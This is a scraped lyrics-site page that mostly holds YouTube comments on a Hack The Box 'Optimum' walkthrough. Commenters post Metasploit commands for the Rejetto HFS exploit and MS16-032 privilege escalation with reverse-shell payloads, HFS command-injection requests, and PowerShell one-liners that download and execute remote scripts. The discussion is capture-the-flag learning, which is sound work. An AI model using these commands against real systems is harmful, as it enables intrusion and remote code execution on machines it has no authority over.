Into The Forest
Optimum Vulnerability Lyrics

We have lyrics for 'Into The Forest' by these artists:

Aquaria [John] I crossed the borders of the night Where the sun can…
Jermain Brown Always knew I was different Tried to fit in with the…
St Thomas I went into the forest Even before my birth You think that…
St. Thomas I went into the forest Even before my birth You…

The lyrics are frequently found in the comments by searching or by filtering for lyric videos

TRACKS

No Related Genres

More Genres

No Artists Found

More Artists Load All

No Albums Found

More Albums Load All

No Tracks Found

Genre not found

Artist not found

Album not found

Search results not found

Song not found

Most interesting comment from YouTube:

Horizon Holt

4y↑1

@TheCast I acknowledge that "Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Number*" does indeed show that there are 2 cores. How did you guys do it? I just tried it and it still does not work for me.
I used these commands to get a low-privilege meterpreter session:
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
run
Then I ran the following commands:
background
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set target 1
set LHOST tun0
set LPORT 4445
set payload windows/x64/meterpreter/reverse_tcp
run
Waited for awhile, then I got "Exploit completed, but no session was created." at the end.

All comments from YouTube:

Daniel Coloma

4y↑15

Your skills always impresses me ! In 30min you show us different methods to escalate and even with your video, I spend hours to do what you show... Thanks for your work

Matt McClure

5y↑18

For the curious, I was having a LOT of trouble getting anything to work in Powershell, my error was I skipped him exploiting Rejetto because I had already done that using a different exploit to get a non-PS shell (therefore I skipped the explantation about PS paths and 32 v. 64 at 9:17)
I picked up the video starting after he got his (64-bit!) PS shell, the Invoke-MS16032.ps1 would run but fail with "No valid thread handles were captured, exiting!" Other exploits would die, no output, etc. Then I tried this one: https://github.com/WindowsExploits/Exploits/blob/master/CVE-2016-7255/CVE-2016-7255.ps1 and got something about "exploit is only for 64-bit." I thought it was just a broken script, then I finally realized, while the OS is 64-bit, just running powershell.exe from a shell runs the 32-bit Powershell. Things I learned:
1. Run [Environment]::Is64BitProcess in PS to determine if you are running 32 or 64 bit PS
2. Run this to launch 64-bit PS binary C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe
After this, the CVE PS script ran a-ok and I got finally SYSTEM without needing Metasploit. What a frustrating but educational ride.

Vladimir Ichkov

Dude, thank you so much! I've been beating my head against the wall on a similar machine. How the hell would I know I was running a 32-bit PS... Did you mange to run the exploit directly through cmd.exe without PS? I noticed that my cmd.exe is running on 32-bit so that might be the issue.

Gary Weessies

Umm. There is no longer a \SysNative\ folder in the box. There is a version of powershell in each of \System32 and \SysWOW64 , but the \SysWOW64 one can't privesc. I think they took away the \SysNative folder to make it harder?

Horizon Holt

4y↑25

To anyone who is trying out ms16_032_secondary_logon_handle_privesc on Metasploit as the method to priv esc (as what IppSec and some walkthroughs did), if you are attempting this machine as a Retired machine, you will not be able to use this method anymore, for the fact that retired HTB boxes do not necessarily have the same system specifications of Active machines.

The retired Optimum machine only has 1 core (as seen from systeminfo), while the exploit requires at least 2 cores.

Horizon Holt

@Xopher000 A fork of the original PowerShell Empire is actively supported by BC-SECURITY on GitHub - do check them out!

Xopher000

I was wondering this too. It also looks like Powershell Empire is no longer supported. Fortunately there are other exploits that do work and are easy to execute

Joseph DeVon

@Horizon Holt i'm having the same issue.

Horizon Holt

4y↑1

TheCast

did it using the ms16_032 method for five minutes ago

8 More Replies...

techytube

4y↑26

I don't think it worked the first time without URL encoding, the only packets in the tcpdump output are http packets, no icmp. It worked the second time with ctrl+u, url encoded

DSAhmed

3y↑1

@Shankara Narayana works with a +, or %20 (the browser automatically subs that encoding for me) but for some reason it needs the ".exe" extension in the command. I don't know enough about this to know why.

GET /?search=%00{.exec|ping.exe 192.168.119.206.} <-- works
GET /?search=%00{.exec|ping 192.168.119.206.} <-- nope. Fails.

Shankara Narayana

GET /?search=%00{.exec|C:\Windows\System32\PING.EXE+192.168.119.206.} works

Franci Šacer

6y↑2

Using the Empire one is a nice tip :) Good job on explaining the vulnerability

Rasta Mouse

6y↑16

Thanks for bringing Sherlock back! :D

I tend to do something like: `iex ((new-object net.webclient).downloadstring("http://x.x.x.x/Sherlock.ps1")); Find-AllVulns`. Saves having to mod the script.

Rasta Mouse

lol brilliant.

I had a hard time with this box actually. Not sure if it's something to do with the netcat shell, but powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring('http://x.x.x.x/x'))" just wasn't working. Wouldn't even get a hit on my web server. Not sure if it was something to do with the single and double quotes, but as soon as I base64'd and used -enc instead, it worked first time.

Who knows these things ¯\_(ツ)_/¯

IppSec

6y↑5

Ha. Completely forgot you could do that. Had one really bad experience where something funny happened with common characters for injection. So it would hit my box to download script then error out. Ever since then I've just modified the script so if I see it call back I know it executed... Well 99.9% of the time. Fun story, if you do "Powershell Powershell IEX(...)" it will still do the URL Get but then error out.

I wasted so many hours on that, thinking it was some AV that was preventing the script from executing. But no, I was injecting into a Powershell command, when I thought I was injecting into cmd.exe. Damn blind injections.

fabiothebest89lu

thanks for the tip..I'm not so familiar with Powershell but good to know that you can use ";" to execute a new command, a bit like in bash for linux.

Shane Wegner

Useful info, I learned a lot watching the Burp analysis and the methodical stepping through adding pieces, reaching back to a server, getting basic command functions, finding .ps1s that do things we want.

I struggle a little bit when you internally say "Well, it's been a full 200 ms, that's probably enough, I'll just slam enter and move on to the next subject at the speed of light."

Songchen Han

4y↑1

Just want to drop another comment here, thanks ippsec, this particular walkthrough basically became my holy rules for privilege escalations.

Sammy Williams

@Songchen Han That's exactly what I thought until I went to a medium blog using the powershell method and compared my command to theirs. Only some two characters were the wrong case, but other than that it was flawless. I found out that powershell is not case sensitive anyways. After literally copying the command from the website (copying the raw and URL encoding it AND copying the URL encoded version and replacing the request in its entirety) it STILL didn't work.

So I asked my friend who had completed the box and they said it was having issues with powershell, so they used Metasploit. I explained to them I wanted to learn that method, and they said the box must be broken.

Now you're saying you did it a week ago with that method. I just wish I knew what the issue was.

Songchen Han

@Sammy Williams Then there is a command issue, otherwise the powershell is not execute correctly.

Sammy Williams

@Songchen Han whenever I try to do the next part, I don't see a response on my webserver. It's not even an issue with the exploit itself, but it's the actual powershell script that isn't grabbing my exploit from my machine.

Sammy Williams

@Songchen Han pinging myself does indeed work.

Songchen Han

@Sammy Williams Hello Sammy. There could be several reason why it does not work. Have you tried ping yourself to make sure the exploit works? Is your exploit IP address correct? Have you try different port? Have you tried delete the content in burp and start from all over again?

This method is working as I tested a week ago, all you need to do is being patient and try troubleshoot. It will work if you do it right. Good luck!

4 More Replies...

Ch. Spiros

5y↑1

Hi Ippsec, for the Access Denied error at 25:28 it has to do with write permissions of a temp powershell script. you can set W_PATH C:\\Windows\\Temp in the advanced options and it works. Congrats for your channel and thanks a lot for the knowledge sharing

Panagiotis Mitkas

6y↑5

Great walkthrough as usual ippsec. Never thought it could be exploited like that too.
I used the rejetto module for user shell and then i created a msfvenom payload.I uploaded both the payload and the ms16032 script with metasploit and then invoked the script in Powershell. First i edited the script at the path part pointing to the payload.Thought it much simpler like that,of course lacking good knowledge of Powershell to do what you did in the video.
Anyways keep up the good wordk ippsec you are a true guru!

simone oddi

Good evening guys.
I am new to penetration testing and of course I have so many doubts and questions.
All the powershell commands that he added to burp suite are commands that you find inside the payload or you need to know those?
Thank you for your response

Julio Ureña

6y↑2

hahaha I did too many steps to get this box without metasploit :D Thanks for sharing! IppSec you rocks!

Jo Wilson

It's really fascinating how finicky and strange it is working through MSF versus the clarity and simplicity of doing it manually. Like, yeah it took a little longer doing it through Powershell, but it was 100% clear exactly what was happening the entire time. Once you shifted into MSF, there was this whole other layer of obfuscation and strangeness and particular parameters needing to be just so, plus the workflow got really messy and hard to follow. Neat to see that side by side. I've never seen a more convincing argument for not using Metaploit lol

Divan Mohr

5y↑3

Followed step for step and was still not able to get privesc, went the metasploit route, great vid though!!

Ian Reynoso

4y↑1

Great video! Is it just me or did anyone else notice that the server did not indeed 'ping' him during the CSS portion of the testing. TCPDUMP simply showed the SYN/ACK packets between the webserver and his box. No ICMP packets... Just saying :)

jason johnson

Hey great walkthrough, the only thing I find confusing is how you'd know that there was an exploit on empire? Obviously you know in advance where everything is but would have been good if you sort of explained the steps of how you'd end up finding powershell empire's module. If I was just doing the box alone I'd have never thought to look at empire and would probably end up dismissing the PoC on github as something that wouldn't work on this box and so I guess i'm just wondering how you knew to pick that specific exploit and what amendments would have needed to be made to the PoC for the exploit to work?

happy harry

he just searched for it on google or empire itself. and u should never dismiss anything u find as there is always a chance it would work , u just have to try it , there is no one way or an optimal way in these kind of things it's always a hit and miss, so u should never dismiss anything ur not sure that wouldn't work

Klemza K

As alwasy amazing..

Jess A

4y↑2

Hi, thanks for video and all the tips inside. I think that you're not getting ICMP packets when you do just the "%00{.exec|ping 10.10.14.17.}" what you see is your HTTP traffic (GET request and the response). In my case at least I didn't manage to make that work (i.e.: see the icmp traffic). While it works if I do a "powershell.exe ping 10.10.14.17" instead.

Ben Holloway

@Ephirr Hey guys. I have the same findings. |%00{.exec|powershell.exe+ping+10.10.14.7.}" Do you know why i need the period after the ip address?

Ephirr

Well thank you! I had the same problem making it work manually, and adding powershell.exe did the job. I don't know why it doesn't work right away though.

Xopher000

This may not have existed at the time of recording, but there is an exploit on exploit-db which makes the process of getting a rev-shell a lot simpler: https://www.exploit-db.com/exploits/39161

Brendan Gabriel Ortiz

Can someone please explain to me why it matters that the priv escalation has to be run in 64bit? I did this box by myself up until the priv escalation b/c it was failing. Couldn't figure out why and watched this and I am really glad I did b/c I learned a lot about manual tools and powershell and what not. Thanks for the video any further clarification would be great.

happy harry

no apparent reason , in theory it should work when he migrated to a 64bit session but it didn't , so he tried to upload a 64bit meterpreter and it worked, u have to realise a lot of the software is buggy and it becomes even worse when it works with other software so as a hacker u just have to find ur way around it

Ben Holloway

4y↑2

Can any one tell me how he knew to use the empire MS16032. or how I could come to the same conclusion? Thanks ladies and gents.

106_Sam

The only thing that can help you become good in making conclusion is that you need to keep track of every news related to hacking, vulnerabilities and patches

Ben Holloway

3y↑1

Did I miss some peice of information. Or is there an article I can read that might help ?

106_Sam

It depends on how much research you have done about the computers and software

Saeed Balquizi

experience

Sputnik K

Great video, thanks! However these days the metasploit module of ms16-032 doesn't seem to work. 64 bit payload on 64 bit meterpreter session give me an error: "[-] Exploit failed: Errno::EPROTO Protocol error @ rb_sysopen - $ZsYFMDYTBateYDl = @" [DllImport("kernel32.dll")] ..." along with a dump of CreateThread function. I changed ports, recreated sessions, etc

Horizon Holt

4y↑1

Angry Old Canadian

yeah it failed for me as well

pai red

Even i tried a lot ..making sure its x64 ..but not working :(

Intellectual Gravy

4y↑6

5:18. I know this is late but am I right to point out that ippsec is not getting ICMP requests and rather is seeing http requests ? Or am I missing something?

HAFIDH ZOUAHI

Well I'm too late, but..
Initially he forgot the icmp filter on the tcpdump command and thought the packets were icmp packets (while they were packets related to the http requests/reponses). It's hard to stay focused while explaining at the same time.

Shankara Narayana

Later at 10:47 he encodes the requests and ICMP pings are visible. I guess that was missing initially. That's all.

Shankara Narayana

@ippsec Hey i was wondering about the same thing, I tried simulating some ICMP traffic and it said ICMP in the tcp dump but when we do th {exec ping ...} no ICMP packets comes up. So are we missing something?

sierikas

Exactly, he is getting http replies, but NOT icmp echo replies.

Salah Saleh

5y↑2

Hello IppSec,
First thank you for teaching us every video new trick.
I had a problem with the SYSTEM reverse shell i couldnt get it at all and after i got frustrated i coped the root.txt to kostas desktop and it ran. idk why running IEX... and getting shell.ps1 didnt run. and i tried shell.ps1 alone and made sure its correct but in Invoke script it dosent run.
if anyone know why plz tell me coz my brain is almost exploded :)

Vineet Anand

same here

Ron W

4y↑1

I'm having the same problem, this boxy is supposed to be easy, but nothing is working properly.

Michael Redbourne

I'm late to this party, but the reason why the Priv Esc wasn't working initially is because the sscript is attempting to write the TXT file into System32 as kostas. Evidently, kostas is not an admin, and has no rights to sys32.

That being said, attempting the exploit via migrate still yields no shell due to the whole 32 bit migrated to 64 bit issue.

Idan Horowitz

6y↑1

Nice! :D

Asso Bosco

6y↑6

Hi Ippsec, hope you are well, on each video i see you use burp suit, can you do video about burp suit. thank you

emilio miller

6y↑2

What Firefox extension is that?

Mr BlackHat

6y↑4

foxyproxy????

nishant soni

+1, can someone tell us the name of it?

Magnfiyer Lmoro

5y↑1

how does this migrate command works?

Songchen Han

Hello Sir. Is there a tool similar to Sherlock.ps but can be executed on Windows 7/xp ?
Plus, as a newbie, where can I learn those great tools? Let me know, thx

Songchen Han

by executed on Windows 7/xp, I mean does not require powershell to run. Or maybe powershell is always a good start?

Do Thien An Duong

Do you have any tips on Linux Priv Esc, when shell is not really working for meterpreter?

Shad Price

5y↑1

Try Harder 💪😁

Gormless Ostrich

4y↑1

THANK YOU! THANK YOU! THANK YOU!

David Rico

Great video!!! Thks!!

H A R I

Thanks a TON !!!!

Rishabh Kumar

0:11 now I know where you did this box originally in 2014

ashmit adhikari

where?

Luke Schmidt

Hey IppSec, coming back to this a couple of years too late - do you know if this box has since been modified? I can't get the PowerShell execution through HFS. So I jumped in with MSF, Listing the contents of C:\Windows, there isn't a SysNative folder? See Screenie: https://ibb.co/dmyJPrH Has 64-bit powershell since been removed from this machine?

Luke Schmidt

@IppSec Hey Ipp, figured it out - I was sure I was running in 32-bit process, turns out I was, SysNative just won't appear when you a run a dir command for some reason even if you are in a 32-bit process., but you can still interact with it just fine. ¯\_(ツ)_/¯

IppSec

Maybe you’re already 64 bit? I believe that dir may only exist when you’re in a 32 bit process.

bleon proko

For those of you who didn't do it via ms16-032, it does not work due to the fact that there is 1 core (race conditioning requires 2). use ms16-098

DeWayne West

Hi Ippsec, where did you get port 1337 when creating the initial shell?

Michael

it's the most leet port.

George F.

I have been trying to use the same technique.. but I am not able to even ping or get reverse shell etc. However, msf exploit works. Is there any change in machine? Why could that be?

George F.

4y↑1

@Ben Holloway Thanks. I was also able to use the technique after I did reset the machine.

Ben Holloway

I have popped the box with the method in this video today.

Sewie

Should I be using a virtual machine and a VPN while using this?

IppSec

6y↑1

Virtual Machine yes. VPN is not needed.

MrPakeryoko

well my question is: if there will be another video in between the next box or no this time :p

IppSec

No idea. I'd say its unlikely, doesn't look like I'll have much free time this upcoming week.

DSAhmed

Your tcpdump trying to pick up PING is not actually working. (at about 5:00) I've made that same mistake and got prematurely excited that it worked. Note, your TCPdump is picking up all packets not just ICMP, and what you're seeing is the HTTP going across the same interface, not the PING.

DSAhmed

and ping requires ".exe" no idea why.

Danan jaya

when send from repeater burpsuite, why nothing happen on my simpleHTTPServer even i was already encode before send it.

M H

The video quality is too low. Letters ate too small and hazy, even when zooming in.

Balla Baby

Is there an alternative to Sherlock, other than Watson, that is not deprecated? Watson repo doesn't seem to supply the exe in the tags and other than using visual studio, I'm not sure how else to build the exe (especially on a linux box). Any powershell scripts that have the same functionality as Sherlock and aren't deprecated?

Nelson

6y↑9

That tcpdump capture is not related to icmp packets, I don't think the ping even worked, those captured packets looked like tcp packets

Simon Tarplin

5y↑8

This threw me for some time as I couldn't get the ping to work as described even when the search parameter was encoded and terminated with '.}'. In the end I got it working by explicitly adding the .exe extension. The encoded search param that worked for me is as follows (ensure you change the IP address for your own):

%00{.exec|ping.exe+10.10.14.17.}

sagar batra

Pasquale Russiello

6y↑4

this is correct. The tcpdump shows the traffic (http requests) that were sent via Burp repeater :-) I make this mistake often. This is why it would be better to only filter icmp traffic in the tcpdump ("tcpdump -ni tun0 icmp")

Vineet Anand

6:17 it is not pinging. there are no icmp packets only http packets.
i tried with {.exec|C:\System32\cmd.exe ping ip.} still not working. I believe it only works with powershell

ken chao

I didn't use ps btw

ken chao

Try to url encode it {.exec | ping ip .}

Vache Karapetyan

Тhank you ;)

Paul K.

Quite possibly a stupid question: Why is he using a VPN?
Is it just to mask his IP for the video or is there any other reason?

Paul K.

@IppSec Oh, that makes sense. Thanks for the quick reply.

IppSec

The HTB machines are accessed via VPN

OG-GOJI

Am I the only one who thinks this looks like Optimus?

fabiothebest89lu

You opened a Powershell shell on port 1337 first, then you opened another one on port 1338. That was only because you didn't want to rely on the web RCE and wanted a more stable shell I guess..anyway you could do also without a second shell right? You could have used MS16-032 and be root in the first shell on port 1337, right? Maybe I got a bit confused when you made a mistake in the video.

fabiothebest89lu

yeah, before your answer I just recalled that it executes a new instance of cmd.exe, so I understand. It makes sense to open a new shell. Thanks again for the video and for your answer. p.s. another interesting thing is that we could modify the exploit and instead of executing cmd.exe we could execute a msfvenom payload for executing a meterpreter reverse_tcp shell as shown here: https://zero-day.io/modifyexploits/

IppSec

Correct. The exploit is not just giving your shell elevated rights, it's just executing a separate command as SYSTEM. It's just easier to run entirely new processes than to send stuff back to your current session and deal with nested terminals.

fabiothebest89lu

Thank you. So if you don't open a new shell after the MS16-032 exploit runs, you can't use the first shell as NT/AUTHORITY-SYSTEM even if the exploit is successful? It's compulsory to get a new privileged shell for privesc? Sorry for the dumb question.

IppSec

6y↑4

I got the initial shell on port 1337. For privilege escalation, I have it send a shell to port 1338. I mistakenly execute shell.ps1 first which sends a user shell to 1338. I close out of that, then execute the privesc powershell script to escalate to admin then execute shell.ps1 to send me an administrative shell on port 1338.